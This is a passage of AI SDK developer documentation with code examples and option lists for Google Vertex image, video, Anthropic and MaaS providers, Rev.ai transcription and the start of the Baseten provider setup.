model: vertex.image('imagen-3.0-capability-001'),
prompt: {
text: 'Extend the scene with more of the forest background',
images: [image],
mask,
},
providerOptions: {
vertex: {
edit: {
baseSteps: 50,
mode: 'EDIT_MODE_OUTPAINT',
maskMode: 'MASK_MODE_USER_PROVIDED',
},
} satisfies GoogleVertexImageModelOptions,
},
});
Edit Provider Options
The following options are available under providerOptions.vertex.edit:
- mode - The edit mode to use:
  - EDIT_MODE_INPAINT_INSERTION - Insert objects into masked areas
  - EDIT_MODE_INPAINT_REMOVAL - Remove objects from masked areas
  - EDIT_MODE_OUTPAINT - Extend image beyond boundaries
  - EDIT_MODE_CONTROLLED_EDITING - Controlled editing
  - EDIT_MODE_PRODUCT_IMAGE - Product image editing
  - EDIT_MODE_BGSWAP - Background swap
- baseSteps number - Number of sampling steps (35-75). Higher values = better quality but slower.
- maskMode - How to interpret the mask:
  - MASK_MODE_USER_PROVIDED - Use the provided mask directly
  - MASK_MODE_DEFAULT - Default mask mode
  - MASK_MODE_DETECTION_BOX - Mask from detected bounding boxes
  - MASK_MODE_CLOTHING_AREA - Mask from clothing segmentation
  - MASK_MODE_PARSED_PERSON - Mask from person parsing
- maskDilation number - Percentage (0-1) to grow the mask. Recommended: 0.01.
Imagen Model Capabilities
| Model | Aspect Ratios |
|---|---|
| imagen-3.0-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| imagen-3.0-generate-002 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| imagen-3.0-fast-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| imagen-4.0-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| imagen-4.0-fast-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| imagen-4.0-ultra-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
Gemini Image Models
Gemini image models (e.g. gemini-2.5-flash-image) are multimodal output language models that can be used with generateImage() for a simpler image generation experience. Internally, the provider calls the language model API with responseModalities: ['IMAGE'].
import { vertex } from '@ai-sdk/google-vertex';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: vertex.image('gemini-2.5-flash-image'),
prompt: 'A photorealistic image of a cat wearing a wizard hat',
aspectRatio: '1:1',
});
Gemini image models also support image editing by providing input images:
import { vertex } from '@ai-sdk/google-vertex';
import { generateImage } from 'ai';
import fs from 'node:fs';
const sourceImage = fs.readFileSync('./cat.png');
const { image } = await generateImage({
model: vertex.image('gemini-2.5-flash-image'),
prompt: {
text: 'Add a small wizard hat to this cat',
images: [sourceImage],
},
});
You can also use URLs (including gs:// Cloud Storage URIs) for input images:
import { vertex } from '@ai-sdk/google-vertex';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: vertex.image('gemini-2.5-flash-image'),
prompt: {
text: 'Add a small wizard hat to this cat',
images: ['https://example.com/cat.png'],
},
});
Gemini Image Model Capabilities
| Model | Image Generation | Image Editing | Aspect Ratios |
|---|---|---|---|
| gemini-3.1-flash-image-preview | ✓ | ✓ | 1:1, 2:3, 3:2, 3:4, 4:3, 4:5, 5:4, 9:16, 16:9, 21:9 |
| gemini-3-pro-image-preview | ✓ | ✓ | 1:1, 2:3, 3:2, 3:4, 4:3, 4:5, 5:4, 9:16, 16:9, 21:9 |
| gemini-2.5-flash-image | ✓ | ✓ | 1:1, 2:3, 3:2, 3:4, 4:3, 4:5, 5:4, 9:16, 16:9, 21:9 |
Video Models
You can create Veo video models that call the Vertex AI API
using the .video() factory method. For more on video generation with the AI SDK see generateVideo().
import { vertex } from '@ai-sdk/google-vertex';
import { experimental_generateVideo as generateVideo } from 'ai';
const { video } = await generateVideo({
model: vertex.video('veo-3.1-generate-001'),
prompt:
'A pangolin curled on a mossy stone in a glowing bioluminescent forest',
aspectRatio: '16:9',
});
You can configure resolution and duration:
import { vertex } from '@ai-sdk/google-vertex';
import { experimental_generateVideo as generateVideo } from 'ai';
const { video } = await generateVideo({
model: vertex.video('veo-3.1-generate-001'),
prompt: 'A serene mountain landscape at sunset',
aspectRatio: '16:9',
resolution: '1920x1080',
duration: 8,
});
Provider Options
Further configuration can be done using Google Vertex provider options. You can validate the provider options using the GoogleVertexVideoModelOptions type.
import { vertex } from '@ai-sdk/google-vertex';
import { GoogleVertexVideoModelOptions } from '@ai-sdk/google-vertex';
import { experimental_generateVideo as generateVideo } from 'ai';
const { video } = await generateVideo({
model: vertex.video('veo-3.1-generate-001'),
prompt: 'A serene mountain landscape at sunset',
aspectRatio: '16:9',
providerOptions: {
vertex: {
generateAudio: true,
personGeneration: 'allow_adult',
} satisfies GoogleVertexVideoModelOptions,
},
});
The following provider options are available:
-
generateAudio boolean
Whether to generate audio along with the video.
-
personGeneration
'dont_allow' | 'allow_adult' | 'allow_all'
Whether to allow person generation in the video.
-
negativePrompt string
A description of what to discourage in the generated video.
-
gcsOutputDirectory string
Cloud Storage URI to store the generated videos.
-
referenceImages Array<{ bytesBase64Encoded?: string; gcsUri?: string }>
Reference images for style or asset guidance.
-
pollIntervalMs number
Polling interval in milliseconds for checking task status.
-
pollTimeoutMs number
Maximum wait time in milliseconds for video generation.
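As a sketch combining the storage and polling options (the bucket URI and timings are placeholders):
import { vertex, GoogleVertexVideoModelOptions } from '@ai-sdk/google-vertex';
import { experimental_generateVideo as generateVideo } from 'ai';
const { video } = await generateVideo({
  model: vertex.video('veo-3.1-generate-001'),
  prompt: 'A time-lapse of clouds rolling over a mountain ridge',
  aspectRatio: '16:9',
  providerOptions: {
    vertex: {
      gcsOutputDirectory: 'gs://my-bucket/videos', // placeholder bucket
      pollIntervalMs: 5000, // check status every 5 seconds
      pollTimeoutMs: 10 * 60 * 1000, // give up after 10 minutes
    } satisfies GoogleVertexVideoModelOptions,
  },
});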
Model Capabilities
| Model | Audio Support |
|---|---|
| veo-3.1-generate-001 | Yes |
| veo-3.1-fast-generate-001 | Yes |
| veo-3.0-generate-001 | Yes |
| veo-3.0-fast-generate-001 | Yes |
| veo-2.0-generate-001 | No |
Google Vertex Anthropic Provider Usage
The Google Vertex Anthropic provider for the AI SDK offers support for Anthropic's Claude models through the Google Vertex AI APIs. This section provides details on how to set up and use the Google Vertex Anthropic provider.
Provider Instance
You can import the default provider instance vertexAnthropic from @ai-sdk/google-vertex/anthropic:
import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
If you need a customized setup, you can import createVertexAnthropic from @ai-sdk/google-vertex/anthropic and create a provider instance with your settings:
import { createVertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
const vertexAnthropic = createVertexAnthropic({
project: 'my-project', // optional
location: 'us-central1', // optional
});
Node.js Runtime
For Node.js environments, the Google Vertex Anthropic provider supports all standard Google Cloud authentication options through the google-auth-library. You can customize the authentication options by passing them to the createVertexAnthropic function:
import { createVertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
const vertexAnthropic = createVertexAnthropic({
googleAuthOptions: {
credentials: {
client_email: 'my-email',
private_key: 'my-private-key',
},
},
});
Optional Provider Settings
You can use the following optional settings to customize the Google Vertex Anthropic provider instance:
-
project string
The Google Cloud project ID that you want to use for the API calls. It uses the GOOGLE_VERTEX_PROJECT environment variable by default.
-
location string
The Google Cloud location that you want to use for the API calls, e.g. us-central1. It uses the GOOGLE_VERTEX_LOCATION environment variable by default.
-
googleAuthOptions object
Optional. The Authentication options used by the Google Auth Library. See also the GoogleAuthOptions interface.
- authClient object - An AuthClient to use.
- keyFilename string - Path to a .json, .pem, or .p12 key file.
- keyFile string - Path to a .json, .pem, or .p12 key file.
- credentials object - Object containing client_email and private_key properties, or the external account client options.
- clientOptions object - Options object passed to the constructor of the client.
- scopes string | string[] - Required scopes for the desired API request.
- projectId string - Your project ID.
- universeDomain string - The default service domain for a given Cloud universe.
-
headers Resolvable<Record<string, string | undefined>>
Headers to include in the requests. Can be provided in multiple formats:
- A record of header key-value pairs: Record<string, string | undefined>
- A function that returns headers: () => Record<string, string | undefined>
- An async function that returns headers: async () => Record<string, string | undefined>
- A promise that resolves to headers: Promise<Record<string, string | undefined>>
-
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
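For example, headers can be resolved asynchronously and fetch can be wrapped for logging; a minimal sketch (the header name and logging are illustrative):
import { createVertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
const vertexAnthropic = createVertexAnthropic({
  // async headers function, resolved for each request
  headers: async () => ({
    'x-request-source': 'my-service', // illustrative custom header
  }),
  // custom fetch that logs outgoing requests before forwarding them
  fetch: async (input, init) => {
    console.log('Vertex Anthropic request:', String(input));
    return fetch(input, init);
  },
});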
Edge Runtime
Edge runtimes (like Vercel Edge Functions and Cloudflare Workers) are lightweight JavaScript environments that run closer to users at the network edge. They only provide a subset of the standard Node.js APIs. For example, direct file system access is not available, and many Node.js-specific libraries (including the standard Google Auth library) are not compatible.
The Edge runtime version of the Google Vertex Anthropic provider supports Google's Application Default Credentials through environment variables. The values can be obtained from a json credentials file from the Google Cloud Console.
For Edge runtimes, you can import the provider instance from @ai-sdk/google-vertex/anthropic/edge:
import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic/edge';
To customize the setup, use createVertexAnthropic from the same module:
import { createVertexAnthropic } from '@ai-sdk/google-vertex/anthropic/edge';
const vertexAnthropic = createVertexAnthropic({
project: 'my-project', // optional
location: 'us-central1', // optional
});
For Edge runtime authentication, set these environment variables from your Google Default Application Credentials JSON file:
- GOOGLE_CLIENT_EMAIL
- GOOGLE_PRIVATE_KEY
- GOOGLE_PRIVATE_KEY_ID (optional)
Optional Provider Settings
You can use the following optional settings to customize the provider instance:
-
project string
The Google Cloud project ID that you want to use for the API calls. It uses the GOOGLE_VERTEX_PROJECT environment variable by default.
-
location string
The Google Cloud location that you want to use for the API calls, e.g. us-central1. It uses the GOOGLE_VERTEX_LOCATION environment variable by default.
-
googleCredentials object
Optional. The credentials used by the Edge provider for authentication. These credentials are typically set through environment variables and are derived from a service account JSON file.
- clientEmail string - The client email from the service account JSON file. Defaults to the contents of the GOOGLE_CLIENT_EMAIL environment variable.
- privateKey string - The private key from the service account JSON file. Defaults to the contents of the GOOGLE_PRIVATE_KEY environment variable.
- privateKeyId string - The private key ID from the service account JSON file (optional). Defaults to the contents of the GOOGLE_PRIVATE_KEY_ID environment variable.
-
headers Resolvable<Record<string, string | undefined>>
Headers to include in the requests. Can be provided in multiple formats:
- A record of header key-value pairs: Record<string, string | undefined>
- A function that returns headers: () => Record<string, string | undefined>
- An async function that returns headers: async () => Record<string, string | undefined>
- A promise that resolves to headers: Promise<Record<string, string | undefined>>
-
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Language Models
You can create models that call the Anthropic Messages API using the provider instance.
The first argument is the model id, e.g. claude-3-haiku-20240307.
Some models have multi-modal capabilities.
const model = vertexAnthropic('claude-3-haiku-20240307');
You can use Anthropic language models to generate text with the generateText function:
import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
import { generateText } from 'ai';
const { text } = await generateText({
model: vertexAnthropic('claude-3-haiku-20240307'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Anthropic language models can also be used in the streamText function
and support structured data generation with Output
(see AI SDK Core).
The following optional provider options are available for Anthropic models:
-
sendReasoning boolean
Optional. Include reasoning content in requests sent to the model. Defaults to true.
If you are experiencing issues with the model handling requests involving reasoning content, you can set this to false to omit them from the request.
-
thinking object
Optional. See the Reasoning section for more details.
-
metadata object
Optional. Metadata to include with the request. See the Anthropic API documentation for details.
- userId string - An external identifier for the end-user.
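A minimal sketch passing these options (the user id is a placeholder):
import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
import { generateText } from 'ai';
const { text } = await generateText({
  model: vertexAnthropic('claude-3-5-sonnet-v2@20241022'),
  prompt: 'Summarize the plot of Hamlet in two sentences.',
  providerOptions: {
    anthropic: {
      sendReasoning: false, // omit reasoning content from the request
      metadata: { userId: 'user-123' }, // placeholder external user id
    },
  },
});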
Reasoning
Anthropic has reasoning support for the claude-3-7-sonnet@20250219 model.
You can enable it using the thinking provider option
and specifying a thinking budget in tokens.
import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
import { generateText } from 'ai';
const { text, reasoningText, reasoning } = await generateText({
model: vertexAnthropic('claude-3-7-sonnet@20250219'),
prompt: 'How many people will live in the world in 2040?',
providerOptions: {
anthropic: {
thinking: { type: 'enabled', budgetTokens: 12000 },
},
},
});
console.log(reasoningText); // reasoning text
console.log(reasoning); // reasoning details including redacted reasoning
console.log(text); // text response
See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.
Cache Control
In the messages and message parts, you can use the providerOptions property to set cache control breakpoints.
You need to set the anthropic property in the providerOptions object to { cacheControl: { type: 'ephemeral' } } to set a cache control breakpoint.
The cache creation input tokens are then returned in the providerMetadata object
for generateText, again under the anthropic property.
When you use streamText, the response contains a promise
that resolves to the metadata. Alternatively you can receive it in the
onFinish callback.
import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
import { generateText } from 'ai';
const errorMessage = '... long error message ...';
const result = await generateText({
model: vertexAnthropic('claude-3-5-sonnet-20240620'),
messages: [
{
role: 'user',
content: [
{ type: 'text', text: 'You are a JavaScript expert.' },
{
type: 'text',
text: `Error message: ${errorMessage}`,
providerOptions: {
anthropic: { cacheControl: { type: 'ephemeral' } },
},
},
{ type: 'text', text: 'Explain the error message.' },
],
},
],
});
console.log(result.text);
console.log(result.providerMetadata?.anthropic);
// e.g. { cacheCreationInputTokens: 2118, cacheReadInputTokens: 0 }
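With streamText, the metadata can be read in the onFinish callback as described above; a minimal sketch:
import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
import { streamText } from 'ai';
const result = streamText({
  model: vertexAnthropic('claude-3-5-sonnet-20240620'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'You are a JavaScript expert.',
          providerOptions: {
            anthropic: { cacheControl: { type: 'ephemeral' } },
          },
        },
        { type: 'text', text: 'Explain closures.' },
      ],
    },
  ],
  onFinish({ providerMetadata }) {
    // e.g. { cacheCreationInputTokens: ..., cacheReadInputTokens: ... }
    console.log(providerMetadata?.anthropic);
  },
});
for await (const textPart of result.textStream) {
  process.stdout.write(textPart);
}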
You can also use cache control on system messages by providing multiple system messages at the head of your messages array:
const result = await generateText({
model: vertexAnthropic('claude-3-5-sonnet-20240620'),
messages: [
{
role: 'system',
content: 'Cached system message part',
providerOptions: {
anthropic: { cacheControl: { type: 'ephemeral' } },
},
},
{
role: 'system',
content: 'Uncached system message part',
},
{
role: 'user',
content: 'User prompt',
},
],
});
For more on prompt caching with Anthropic, see Google Vertex AI's Claude prompt caching documentation and Anthropic's Cache Control documentation.
Tools
Google Vertex Anthropic supports a subset of Anthropic's built-in tools. The following tools are available via the tools property of the provider instance:
- Bash Tool: Allows running bash commands.
- Text Editor Tool: Provides functionality for viewing and editing text files.
- Computer Tool: Enables control of keyboard and mouse actions on a computer.
- Web Search Tool: Provides access to real-time web content.
For more background on Anthropic tools, see Anthropic's documentation.
Bash Tool
The Bash Tool allows running bash commands. Here's how to create and use it:
const bashTool = vertexAnthropic.tools.bash_20250124({
execute: async ({ command, restart }) => {
// Implement your bash command execution logic here
// Return the result of the command execution
},
});
Parameters:
- command (string): The bash command to run. Required unless the tool is being restarted.
- restart (boolean, optional): Specifying true will restart this tool.
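The created tool is then passed like any other tool; a minimal sketch in which the execution logic is left as a stub:
import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
import { generateText, stepCountIs } from 'ai';
const bashTool = vertexAnthropic.tools.bash_20250124({
  execute: async ({ command }) => {
    // stub: run the command in your own sandbox and return its output
    return `ran: ${command}`;
  },
});
const { text } = await generateText({
  model: vertexAnthropic('claude-3-7-sonnet@20250219'),
  prompt: 'List the files in the current directory.',
  tools: { bash: bashTool },
  stopWhen: stepCountIs(5),
});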
Text Editor Tool
The Text Editor Tool provides functionality for viewing and editing text files:
const textEditorTool = vertexAnthropic.tools.textEditor_20250124({
execute: async ({
command,
path,
file_text,
insert_line,
new_str,
insert_text,
old_str,
view_range,
}) => {
// Implement your text editing logic here
// Return the result of the text editing operation
},
});
Parameters:
- command ('view' | 'create' | 'str_replace' | 'insert' | 'undo_edit'): The command to run. Note: undo_edit is not supported in textEditor_20250429 and textEditor_20250728.
- path (string): Absolute path to file or directory, e.g. /repo/file.py or /repo.
- file_text (string, optional): Required for the create command, with the content of the file to be created.
- insert_line (number, optional): Required for the insert command. The line number after which to insert the new string.
- new_str (string, optional): New string for the str_replace command.
- insert_text (string, optional): Required for the insert command, containing the text to insert.
- old_str (string, optional): Required for the str_replace command, containing the string to replace.
- view_range (number[], optional): Optional for the view command to specify the line range to show.
- max_characters (number, optional): Optional maximum number of characters to view in the file (only available in textEditor_20250728).
Computer Tool
The Computer Tool enables control of keyboard and mouse actions on a computer:
import fs from 'node:fs';
const computerTool = vertexAnthropic.tools.computer_20241022({
displayWidthPx: 1920,
displayHeightPx: 1080,
displayNumber: 0, // Optional, for X11 environments
execute: async ({ action, coordinate, text }) => {
// Implement your computer control logic here
// Return the result of the action
// Example code:
switch (action) {
case 'screenshot': {
// multipart result:
return {
type: 'image',
data: fs
.readFileSync('./data/screenshot-editor.png')
.toString('base64'),
};
}
default: {
console.log('Action:', action);
console.log('Coordinate:', coordinate);
console.log('Text:', text);
return `executed ${action}`;
}
}
},
// map to tool result content for LLM consumption:
toModelOutput({ output }) {
return typeof output === 'string'
? [{ type: 'text', text: output }]
: [{ type: 'image', data: output.data, mediaType: 'image/png' }];
},
});
Parameters:
- action ('key' | 'type' | 'mouse_move' | 'left_click' | 'left_click_drag' | 'right_click' | 'middle_click' | 'double_click' | 'screenshot' | 'cursor_position'): The action to perform.
- coordinate (number[], optional): Required for mouse_move and left_click_drag actions. Specifies the (x, y) coordinates.
- text (string, optional): Required for type and key actions.
Web Search Tool
The Web Search Tool provides Claude with direct access to real-time web content:
const webSearchTool = vertexAnthropic.tools.webSearch_20250305({
maxUses: 5, // Optional: Maximum number of web searches Claude can perform
allowedDomains: ['example.com'], // Optional: Only search these domains
blockedDomains: ['spam.com'], // Optional: Never search these domains
userLocation: {
// Optional: Provide location for geographically relevant results
type: 'approximate',
city: 'San Francisco',
region: 'CA',
country: 'US',
timezone: 'America/Los_Angeles',
},
});
Parameters:
- maxUses (number, optional): Maximum number of web searches Claude can perform during the conversation.
- allowedDomains (string[], optional): Optional list of domains that Claude is allowed to search.
- blockedDomains (string[], optional): Optional list of domains that Claude should avoid when searching.
- userLocation (object, optional): Optional user location information to provide geographically relevant search results.
  - type ('approximate'): The type of location (must be approximate).
  - city (string, optional): The city name.
  - region (string, optional): The region or state.
  - country (string, optional): The country.
  - timezone (string, optional): The IANA timezone ID.
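The tool is then passed to a generate call like any other tool; a minimal sketch:
import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
import { generateText } from 'ai';
const { text } = await generateText({
  model: vertexAnthropic('claude-3-7-sonnet@20250219'),
  prompt: 'What happened in tech news today?',
  tools: {
    web_search: vertexAnthropic.tools.webSearch_20250305({ maxUses: 3 }),
  },
});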
These tools can be used in conjunction with supported Claude models to enable more complex interactions and tasks.
Model Capabilities
The latest Anthropic model list on Vertex AI is available here. See also Anthropic Model Comparison.
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming | Computer Use |
|---|---|---|---|---|---|
| claude-3-7-sonnet@20250219 | | | | | |
| claude-3-5-sonnet-v2@20241022 | | | | | |
| claude-3-5-sonnet@20240620 | | | | | |
| claude-3-5-haiku@20241022 | | | | | |
| claude-3-sonnet@20240229 | | | | | |
| claude-3-haiku@20240307 | | | | | |
| claude-3-opus@20240229 | | | | | |
Google Vertex MaaS Provider Usage
The Google Vertex MaaS (Model as a Service) provider offers access to partner and open models hosted on Vertex AI through an OpenAI-compatible Chat Completions API. This includes models from DeepSeek, Qwen, Meta, MiniMax, Moonshot, and OpenAI.
For more information, see the Vertex AI MaaS documentation.
Provider Instance
You can import the default provider instance vertexMaas from @ai-sdk/google-vertex/maas:
import { vertexMaas } from '@ai-sdk/google-vertex/maas';
If you need a customized setup, you can import createVertexMaas from @ai-sdk/google-vertex/maas and create a provider instance with your settings:
import { createVertexMaas } from '@ai-sdk/google-vertex/maas';
const vertexMaas = createVertexMaas({
project: 'my-project', // optional
location: 'us-east5', // optional, defaults to 'global'
});
Node.js Runtime
For Node.js environments, the Google Vertex MaaS provider supports all standard Google Cloud authentication options through the google-auth-library:
import { createVertexMaas } from '@ai-sdk/google-vertex/maas';
const vertexMaas = createVertexMaas({
googleAuthOptions: {
credentials: {
client_email: 'my-email',
private_key: 'my-private-key',
},
},
});
Optional Provider Settings
-
project string
The Google Cloud project ID. Defaults to the GOOGLE_VERTEX_PROJECT environment variable.
-
location string
The Google Cloud location, e.g. us-east5 or global. Defaults to the GOOGLE_VERTEX_LOCATION environment variable. If not set, defaults to global.
-
googleAuthOptions object
Optional. The Authentication options used by the Google Auth Library.
-
headers Resolvable<Record<string, string | undefined>>
Headers to include in requests.
-
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
Custom fetch implementation.
Edge Runtime
For Edge runtimes, import from @ai-sdk/google-vertex/maas/edge:
import { vertexMaas } from '@ai-sdk/google-vertex/maas/edge';
import { createVertexMaas } from '@ai-sdk/google-vertex/maas/edge';
const vertexMaas = createVertexMaas({
project: 'my-project',
location: 'us-east5',
});
For Edge runtime authentication, set these environment variables:
- GOOGLE_CLIENT_EMAIL
- GOOGLE_PRIVATE_KEY
- GOOGLE_PRIVATE_KEY_ID (optional)
Language Models
You can create models using the provider instance. The first argument is the model ID:
import { vertexMaas } from '@ai-sdk/google-vertex/maas';
import { generateText } from 'ai';
const { text } = await generateText({
model: vertexMaas('deepseek-ai/deepseek-v3.2-maas'),
prompt: 'Invent a new holiday and describe its traditions.',
});
Streaming is also supported:
import { vertexMaas } from '@ai-sdk/google-vertex/maas';
import { streamText } from 'ai';
const result = streamText({
model: vertexMaas('deepseek-ai/deepseek-v3.2-maas'),
prompt: 'Invent a new holiday and describe its traditions.',
});
for await (const textPart of result.textStream) {
process.stdout.write(textPart);
}
Available Models
The following models are available through the MaaS provider. You can also pass any valid model ID as a string.
| Model ID | Provider |
|---|---|
| deepseek-ai/deepseek-r1-0528-maas | DeepSeek |
| deepseek-ai/deepseek-v3.1-maas | DeepSeek |
| deepseek-ai/deepseek-v3.2-maas | DeepSeek |
| openai/gpt-oss-120b-maas | OpenAI |
| openai/gpt-oss-20b-maas | OpenAI |
| meta/llama-4-maverick-17b-128e-instruct-maas | Meta |
| meta/llama-4-scout-17b-16e-instruct-maas | Meta |
| minimax/minimax-m2-maas | MiniMax |
| qwen/qwen3-coder-480b-a35b-instruct-maas | Qwen |
| qwen/qwen3-next-80b-a3b-instruct-maas | Qwen |
| qwen/qwen3-next-80b-a3b-thinking-maas | Qwen |
| moonshotai/kimi-k2-thinking-maas | Moonshot |
title: Rev.ai
description: Learn how to use the Rev.ai provider for the AI SDK.
Rev.ai Provider
The Rev.ai provider contains language model support for the Rev.ai transcription API.
Setup
The Rev.ai provider is available in the @ai-sdk/revai module. You can install it with
pnpm add @ai-sdk/revai
Provider Instance
You can import the default provider instance revai from @ai-sdk/revai:
import { revai } from '@ai-sdk/revai';
If you need a customized setup, you can import createRevai from @ai-sdk/revai and create a provider instance with your settings:
import { createRevai } from '@ai-sdk/revai';
const revai = createRevai({
// custom settings, e.g.
fetch: customFetch,
});
You can use the following optional settings to customize the Rev.ai provider instance:
-
apiKey string
API key that is being sent using the Authorization header. It defaults to the REVAI_API_KEY environment variable.
-
headers Record<string,string>
Custom headers to include in the requests.
-
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Transcription Models
You can create models that call the Rev.ai transcription API
using the .transcription() factory method.
The first argument is the model id, e.g. machine.
const model = revai.transcription('machine');
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the input language in ISO-639-1 (e.g. en) format can sometimes improve transcription performance if known beforehand.
import { experimental_transcribe as transcribe } from 'ai';
import { revai } from '@ai-sdk/revai';
import { type RevaiTranscriptionModelOptions } from '@ai-sdk/revai';
import { readFile } from 'fs/promises';
const result = await transcribe({
model: revai.transcription('machine'),
audio: await readFile('audio.mp3'),
providerOptions: {
revai: { language: 'en' } satisfies RevaiTranscriptionModelOptions,
},
});
The following provider options are available:
-
metadata string
Optional metadata string to associate with the transcription job.
-
notification_config object
Configuration for webhook notifications when job is complete.
- url string - URL to send the notification to.
- auth_headers object - Optional authorization headers for the notification request.
- Authorization string - Authorization header value.
-
delete_after_seconds integer
Number of seconds after which the job will be automatically deleted.
-
verbatim boolean
Whether to include filler words and false starts in the transcription.
-
rush boolean
[HIPAA Unsupported] Whether to prioritize the job for faster processing. Only available for human transcriber option.
-
test_mode boolean
Whether to run the job in test mode. Default is false.
-
segments_to_transcribe Array
Specific segments of the audio to transcribe.
- start number - Start time of the segment in seconds.
- end number - End time of the segment in seconds.
-
speaker_names Array
Names to assign to speakers in the transcription.
- display_name string - Display name for the speaker.
-
skip_diarization boolean
Whether to skip speaker diarization. Default is false.
-
skip_postprocessing boolean
Whether to skip post-processing steps. Only available for English and Spanish languages. Default is false.
-
skip_punctuation boolean
Whether to skip adding punctuation to the transcription. Default is false.
-
remove_disfluencies boolean
Whether to remove disfluencies (um, uh, etc.) from the transcription. Default is false.
-
remove_atmospherics boolean
Whether to remove atmospheric sounds (like <laugh>, <affirmative>) from the transcription. Default is false.
-
filter_profanity boolean
Whether to filter profanity from the transcription by replacing characters with asterisks except for the first and last. Default is false.
-
speaker_channels_count integer
Number of speaker channels in the audio. Only available for English, Spanish and French languages.
-
speakers_count integer
Expected number of speakers in the audio. Only available for English, Spanish and French languages.
-
diarization_type string
Type of diarization to use. Possible values: "standard" (default), "premium".
-
custom_vocabulary_id string
ID of a custom vocabulary to use for the transcription, submitted through the Custom Vocabularies API.
-
custom_vocabularies Array
Custom vocabularies to use for the transcription.
-
strict_custom_vocabulary boolean
Whether to strictly enforce custom vocabulary.
-
summarization_config object
Configuration for generating a summary of the transcription.
- model string - Model to use for summarization. Possible values: "standard" (default), "premium".
- type string - Format of the summary. Possible values: "paragraph" (default), "bullets".
- prompt string - Custom prompt for the summarization (mutually exclusive with type).
-
translation_config object
Configuration for translating the transcription.
- target_languages Array - Target languages for translation. Each item is an object with:
- language string - Language code. Possible values: "en", "en-us", "en-gb", "ar", "pt", "pt-br", "pt-pt", "fr", "fr-ca", "es", "es-es", "es-la", "it", "ja", "ko", "de", "ru".
- model string - Model to use for translation. Possible values: "standard" (default), "premium".
-
language string
Language of the audio content, provided as an ISO 639-1 language code. Default is "en".
-
forced_alignment boolean
Whether to perform forced alignment, which provides improved accuracy for per-word timestamps. Default is false.
Currently supported languages:
- English (en, en-us, en-gb)
- French (fr)
- Italian (it)
- German (de)
- Spanish (es)
Note: This option is not available in low-cost environments.
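As a sketch combining a few of these options (the chosen values are illustrative):
import { experimental_transcribe as transcribe } from 'ai';
import { revai, type RevaiTranscriptionModelOptions } from '@ai-sdk/revai';
import { readFile } from 'fs/promises';
const result = await transcribe({
  model: revai.transcription('machine'),
  audio: await readFile('audio.mp3'),
  providerOptions: {
    revai: {
      language: 'en',
      verbatim: true, // keep filler words and false starts
      summarization_config: { type: 'bullets' }, // illustrative summary format
    } satisfies RevaiTranscriptionModelOptions,
  },
});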
Model Capabilities
| Model | Transcription | Duration | Segments | Language |
|---|---|---|---|---|
| machine | | | | |
| low_cost | | | | |
| fusion | | | | |
title: Baseten
description: Learn how to use Baseten models with the AI SDK.
Baseten Provider
Baseten is an inference platform for serving frontier, enterprise-grade open-source AI models via their API.
Setup
The Baseten provider is available via the @ai-sdk/baseten module. You can install it with
pnpm add @ai-sdk/baseten
Provider Instance
You can import the default provider instance baseten from @ai-sdk/baseten:
import { baseten } from '@ai-sdk/baseten';
If you need a customized setup, you can import createBaseten from @ai-sdk/baseten
and create a provider instance with your settings:
import { createBaseten } from '@ai-sdk/baseten';
const baseten = createBaseten({
apiKey: process.env.BASETEN_API_KEY ?? '',
});
You can use the following optional settings to customize the Baseten provider instance:
-
baseURL string
Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://inference.baseten.co/v1.
-
apiKey string
API key that is being sent using the Authorization header. It defaults to the BASETEN_API_KEY environment variable. It is recommended to set the environment variable (e.g. via export) so you do not need to include the field every time. You can grab your Baseten API key here.
-
modelURL string
Custom model URL for specific models (chat or embeddings). If not provided, the default Model APIs will be used.
-
headers Record<string,string>
Custom headers to include in the requests.
-
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
Custom fetch implementation.
Model APIs
You can select Baseten models using a provider instance.
The first argument is the model id, e.g. 'moonshotai/Kimi-K2-Instruct-0905'. The complete list of models supported under Model APIs can be found here.
const model = baseten('moonshotai/Kimi-K2-Instruct-0905');
Example
You can use Baseten language models to generate text with the generateText function:
import { baseten } from '@ai-sdk/baseten';
import { generateText } from 'ai';
const { text } = await generateText({
model: baseten('moonshotai/Kimi-K2-Instruct-0905'),
prompt: 'What is the meaning of life? Answer in one sentence.',
});
Baseten language models can also be used in the streamText function
(see AI SDK Core).
Dedicated Models
Baseten supports dedicated model URLs for both chat and embedding models. You have to specify a modelURL when creating the provider:
OpenAI-Compatible Endpoints (/sync/v1)
For models deployed with Baseten's OpenAI-compatible endpoints:
import { createBaseten } from '@ai-sdk/baseten';
import { generateText } from 'ai';
const baseten = createBaseten({
